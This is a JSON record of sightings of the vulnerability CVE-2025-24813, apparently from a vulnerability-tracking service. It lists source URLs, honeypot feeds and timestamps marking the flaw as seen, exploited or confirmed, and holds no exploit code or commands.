{"vulnerability": "CVE-2025-24813", "sightings": [{"uuid": "8b5889ed-45c5-4116-b690-bf497853e044", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llmbcjsy3y2k", "content": "", "creation_timestamp": "2025-03-30T16:30:07.926184Z"}, {"uuid": "9f0b1175-ebea-4228-8b98-ac8d81ebf1e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3llmcv5oink62", "content": "", "creation_timestamp": "2025-03-30T18:54:42.127861Z"}, {"uuid": "979ef832-5c15-4f63-b1df-32736b7cc783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/keesnk.bsky.social/post/3llnne2pwck2m", "content": "", "creation_timestamp": "2025-03-31T05:38:23.958552Z"}, {"uuid": "18f1e862-1c5f-4dba-a5a2-ff45eb2e80ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/threatcodex/statuses/114258768746288578", "content": "", "creation_timestamp": "2025-03-31T19:47:31.263778Z"}, {"uuid": "8ac8eba3-b200-4839-8684-7c904ce0dbfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/threatcodex/statuses/114258768746288578", "content": "", "creation_timestamp": "2025-03-31T19:47:31.268002Z"}, {"uuid": "507aed0f-9c8b-4519-b901-91e2c1fefddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3llnz5hx6sxk2", "content": "", "creation_timestamp": "2025-03-31T09:09:38.167623Z"}, {"uuid": "12fe16d4-a6fb-49d7-ae8c-f683950fb679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lloh3tarruk2", "content": "", "creation_timestamp": "2025-03-31T13:22:05.176042Z"}, {"uuid": "df0c6631-d69a-4f76-bc5b-b5c31149d7dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lklnefya422p", "content": "", "creation_timestamp": "2025-03-17T17:08:06.479889Z"}, {"uuid": "98e6480b-b1c5-479b-8b40-7d04f404d702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/@decio/114178686852726674", "content": "", "creation_timestamp": "2025-03-17T17:11:45.356934Z"}, {"uuid": "c5597af4-ec33-4b93-bf3f-073d6b9039a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://github.com/absholi7ly/POC-CVE-2025-24813", "content": "", "creation_timestamp": "2025-03-17T17:12:01.668388Z"}, {"uuid": "64556695-ce2e-45d1-a4d9-9048180203f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/piyokango.bsky.social/post/3lky2dh5cwc2k", "content": "", "creation_timestamp": "2025-03-22T15:32:08.864422Z"}, {"uuid": "5f25ceb5-1349-4a80-85b1-37db3058d7cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lk4vwkzlsw2n", "content": "", "creation_timestamp": "2025-03-11T20:31:27.070494Z"}, {"uuid": "62beafea-9959-475e-a103-6b5614d5a0a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "83d6dcf9-4c7a-422c-ab11-48a253e8b114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lkeet3qls42e", "content": "", "creation_timestamp": "2025-03-14T19:46:34.764631Z"}, {"uuid": "88e8e15e-7a3d-4f4f-aecf-310f5f463e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/n0n_zer0/statuses/114197263247775331", "content": "", "creation_timestamp": "2025-03-20T23:06:59.715247Z"}, {"uuid": "e83b1ea2-161f-427c-adf8-792795a3fd0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3lknwh4wbds2i", "content": "", "creation_timestamp": "2025-03-18T14:56:02.345143Z"}, {"uuid": "3281ca91-af27-4bdf-a906-8cc144fad823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkpseehj6zv2", "content": "", "creation_timestamp": "2025-03-19T08:52:49.636434Z"}, {"uuid": "dc6ca7e3-a3e4-4757-be89-442a4096cf82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/omo.bsky.social/post/3lk2g3iyf622b", "content": "", "creation_timestamp": "2025-03-10T20:42:35.050215Z"}, {"uuid": "db33db32-0b39-464b-b56d-54e0fced3b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/tweekfawkes.bsky.social/post/3lksnrmbgso2i", "content": "", "creation_timestamp": "2025-03-20T12:04:05.794441Z"}, {"uuid": "77266eec-fdd7-43a4-8cdc-393f7a39656d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ehcgroup.bsky.social/post/3lk6ys62pi22w", "content": "", "creation_timestamp": "2025-03-12T16:28:03.077293Z"}, {"uuid": "b952a8ff-97f7-4d6e-a64f-f2ec4bfe5b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/zackster.bsky.social/post/3lknx5d26b62m", "content": "", "creation_timestamp": "2025-03-18T15:08:22.739416Z"}, {"uuid": "9f2d5876-91d6-41c9-99df-5f46c99cbc3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkviioziarx2", "content": "", "creation_timestamp": "2025-03-21T15:15:28.180883Z"}, {"uuid": "1ba414a6-2456-4553-b631-14739b4d8f8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dragstersystems.bsky.social/post/3lk6zyzv4ac23", "content": "", "creation_timestamp": "2025-03-12T16:49:46.850757Z"}, {"uuid": "2199ed9b-4460-4576-b4b4-4fc646f1b4e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/fireboat.bsky.social/post/3lklq7b5crc2t", "content": "", "creation_timestamp": "2025-03-17T17:58:53.533977Z"}, {"uuid": "7bee1d34-709e-400f-93a5-e162da70ab88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lklr5mydo22i", "content": "", "creation_timestamp": "2025-03-17T18:15:51.933167Z"}, {"uuid": "3d9d783b-4469-4e21-a139-70da3a671e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lklrlhrayc27", "content": "", "creation_timestamp": "2025-03-17T18:23:38.629910Z"}, {"uuid": "5c346278-f597-4ef6-8f77-5a3af3a0cbf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pvynckier.bsky.social/post/3lkivjsb7nc2a", "content": "", "creation_timestamp": "2025-03-16T14:56:17.208621Z"}, {"uuid": "bc0ea431-d893-48e4-8dda-4905cd16bb08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk34atqmj22v", "content": "", "creation_timestamp": "2025-03-11T03:19:19.002052Z"}, {"uuid": "43410890-5b0f-4f23-b959-4915d6732602", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkisb7sias2e", "content": "", "creation_timestamp": "2025-03-16T13:57:50.582286Z"}, {"uuid": "e8906ff4-e7a0-4ff3-92b0-d07011df5374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lk72mm2bos2n", "content": "", "creation_timestamp": "2025-03-12T17:00:41.337128Z"}, {"uuid": "c0fe54c4-c5fc-4a89-9167-88451092049f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/rajsamani.bsky.social/post/3lksqe572yc26", "content": "", "creation_timestamp": "2025-03-20T12:50:16.505480Z"}, {"uuid": "c05f6935-c34f-47f7-a493-359eb1c56f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk4ws2b6kw2r", "content": "", "creation_timestamp": "2025-03-11T20:46:49.191138Z"}, {"uuid": "81edc58c-6e82-4edc-9d3f-1403dbb7702a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkcu4u2mqg42", "content": "", "creation_timestamp": "2025-03-14T05:24:38.761026Z"}, {"uuid": "4910d2e1-834b-48db-8a0b-cbe20f0d812b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://threatintel.cc/2025/03/18/critical-rce-flaw-in-apache.html", "content": "", "creation_timestamp": "2025-03-18T12:16:32.000000Z"}, {"uuid": "d417faa1-4e83-4e9f-9647-9ab5446b5290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4m3ckhnen2", "content": "", "creation_timestamp": "2025-03-24T11:00:56.151403Z"}, {"uuid": "811c6b28-6487-4364-be1f-8b66d8a9cc0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4pcv64nbo2", "content": "", "creation_timestamp": "2025-03-24T12:10:43.922898Z"}, {"uuid": "37f4ca95-ca20-4f26-80b9-d22eb9794f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4n63andcn2", "content": "", "creation_timestamp": "2025-03-24T11:20:53.013856Z"}, {"uuid": "e59ea23d-31f9-431b-9cee-eb8bf449feeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/114198435326327678", "content": "", "creation_timestamp": "2025-03-21T04:03:57.445977Z"}, {"uuid": "c5db241e-f0d6-4611-8a61-2aff1ddf5c3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html", "content": "", "creation_timestamp": "2025-03-17T16:08:00.000000Z"}, {"uuid": "cdcc9bb5-452c-49cb-9f43-5af2c1c7fa5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/youranonriots.bsky.social/post/3lklyai6nok2l", "content": "", "creation_timestamp": "2025-03-17T20:22:44.402117Z"}, {"uuid": "12c41326-c901-4960-ba47-79a0c4367f97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://swecyb.com/users/nopatience/statuses/114202520435383429", "content": "", "creation_timestamp": "2025-03-21T21:22:59.727849Z"}, {"uuid": "aa8bd7fe-8960-405f-a847-b9fc09b6b9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3g6yvy5227", "content": "", "creation_timestamp": "2025-03-11T06:17:10.784167Z"}, {"uuid": "afdccd7a-c485-4364-b6af-8940c18f1a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://infosec.exchange/users/tomcat/statuses/114179390408544532", "content": "", "creation_timestamp": "2025-03-17T19:20:33.000000Z"}, {"uuid": "47a5d13b-8996-48b8-8142-12e1d8e962b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll5mebo63f72", "content": "", "creation_timestamp": "2025-03-24T20:44:36.923287Z"}, {"uuid": "6df9e942-6998-49f6-95dc-ecf799709c56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "2addb106-d9db-4900-9e76-607e128b82a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkzivwzr5ef2", "content": "", "creation_timestamp": "2025-03-23T05:26:38.558543Z"}, {"uuid": "7488576b-198c-46e5-9b13-ab9760b1bd54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3llar3x6hmf2g", "content": "", "creation_timestamp": "2025-03-26T02:40:49.393419Z"}, {"uuid": "8ee0a0f7-f9bb-41cb-b214-703cb72b7a4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkut4xkahaf2", "content": "", "creation_timestamp": "2025-03-21T08:45:23.243428Z"}, {"uuid": "7da340c7-408a-4856-8d30-ec55bcc45a03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkrkzns6jj2p", "content": "", "creation_timestamp": "2025-03-20T01:42:13.824275Z"}, {"uuid": "46380a99-b7e5-4b60-975d-cf18697f78a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lkrldyr7hn2d", "content": "", "creation_timestamp": "2025-03-20T01:48:01.011605Z"}, {"uuid": "792a3e9a-1bb9-4879-bee2-872ca0aefefa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkd3375fuy2c", "content": "", "creation_timestamp": "2025-03-14T07:19:29.735597Z"}, {"uuid": "cc5d8f5b-7692-4797-8666-d7660f28f921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3nf7k3lk26", "content": "", "creation_timestamp": "2025-03-24T01:51:06.909511Z"}, {"uuid": "e5b5577c-1eca-4791-b7aa-8586bf30546d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "907899d7-ee41-4022-bfd9-42d6564b0f15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3kejzuvc27", "content": "", "creation_timestamp": "2025-03-11T07:31:51.483229Z"}, {"uuid": "485db8e5-043f-43a7-9701-b43a78e724a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lks7zx5a742d", "content": "", "creation_timestamp": "2025-03-20T07:58:12.330861Z"}, {"uuid": "08226e9d-a429-4c12-ac2a-3d37eb790702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/windowsforest.bsky.social/post/3lk3mknajmb2a", "content": "", "creation_timestamp": "2025-03-11T08:11:03.846803Z"}, {"uuid": "bf0396cb-bf2c-4c36-b1bd-8d78ce5ec492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmgqeg3k32g", "content": "", "creation_timestamp": "2025-03-18T00:42:08.515118Z"}, {"uuid": "c46c5990-1538-429f-ab94-952190fa4639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3lkko4phha22c", "content": "", "creation_timestamp": "2025-03-17T07:49:00.766180Z"}, {"uuid": "83f6d2b9-8efa-4172-b7ff-c7caccfdda09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/osanpo.bsky.social/post/3lk3rjwx2my2d", "content": "", "creation_timestamp": "2025-03-11T09:40:08.786411Z"}, {"uuid": "f70ef15c-b9d5-4e9b-af8a-4ae2a855eb77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/114188579059937819", "content": "", "creation_timestamp": "2025-03-19T10:17:34.471974Z"}, {"uuid": "c4326410-e211-413d-98df-f1d4ab407896", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "3c260f70-9e91-4ff8-8df9-ac03735ecbec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkohwaqotk25", "content": "", "creation_timestamp": "2025-03-18T20:08:42.784555Z"}, {"uuid": "4d2baed8-3de8-429f-982c-cd27d4773a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3lk5prjizek2u", "content": "", "creation_timestamp": "2025-03-12T04:13:57.542507Z"}, {"uuid": "343a5343-7a18-45ec-a2a7-19fb951cbada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/GossiTheDog.cyberplace.social.ap.brid.gy/post/3lkpxebr3bjn2", "content": "", "creation_timestamp": "2025-03-19T10:17:46.945040Z"}, {"uuid": "7d45ff4a-8f91-4a64-9028-2eac38a1c204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2025/CVE-2025-24813.yaml", "content": "", "creation_timestamp": "2025-03-12T09:40:28.000000Z"}, {"uuid": "0a89262d-3e7b-49c5-8876-4595778b4c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://ioc.exchange/users/83r71n/statuses/114143314179969928", "content": "", "creation_timestamp": "2025-03-11T10:25:55.294566Z"}, {"uuid": "40d48a1f-4239-461f-9b9d-08ec61031fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkpy7mgkkqi2", "content": "", "creation_timestamp": "2025-03-19T10:33:16.370002Z"}, {"uuid": "a66b0cd1-197a-4b99-acd2-12cfa864afd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkohmij6d225", "content": "", "creation_timestamp": "2025-03-18T20:03:15.708417Z"}, {"uuid": "a3dfbfdc-6c22-4c73-bfa7-6c24e70340da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114143453138863016", "content": "", "creation_timestamp": "2025-03-11T11:01:14.702052Z"}, {"uuid": "6c79ca89-6066-4f20-81a1-45e7a9407543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmngymmoo2e", "content": "", "creation_timestamp": "2025-03-18T02:42:10.345464Z"}, {"uuid": "36d67b89-5ffc-4832-98c9-62bf4a05ab96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkmq7myec22n", "content": "", "creation_timestamp": "2025-03-18T03:31:45.645394Z"}, {"uuid": "9c4743dc-e099-4aa6-8007-462379d9f97b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": 